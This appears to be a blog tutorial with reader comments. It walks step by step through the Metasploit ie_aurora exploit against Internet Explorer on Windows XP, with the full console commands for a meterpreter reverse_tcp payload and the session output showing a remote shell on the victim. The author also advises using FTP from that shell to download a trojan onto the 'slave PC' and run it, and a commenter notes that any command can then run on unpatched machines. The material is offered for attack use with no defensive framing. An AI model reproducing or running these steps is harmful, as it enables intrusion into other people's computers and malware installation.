First you Must Download Metasploit
Code:
http://www.metasploit.com/releases/framework-3.3.3.exe
(Windows OS)
After Download & Install
Run Metasploit Update And Wait Until Update Complete!
Then Run Metasploit Console
Then Do Like This(Bolds Texts is Which You must Write):
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.[*] Started reverse handler on port 4444[*] Local IP:http://192.168.0.151:8080/[*] Server started.
msf exploit(ie_aurora) >
Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:
[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\Developer
meterpreter > use espia
Loading extension espia...success.
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>
[ Remember CMD is Most Useful Control of WIN32 You Can Use FTP Command! To Download Trojan in slave PC! And Run it ]
..................................................................................................................................
Problem, after u created the shell, what can you do.
ReplyDeletenvm, but does it still work, and is there any concept on how this works because I think this is really cool.
ReplyDeleteAfter you have created the shell you can execute any command on the remote computer. And it works if the other computer is unpatched.
ReplyDelete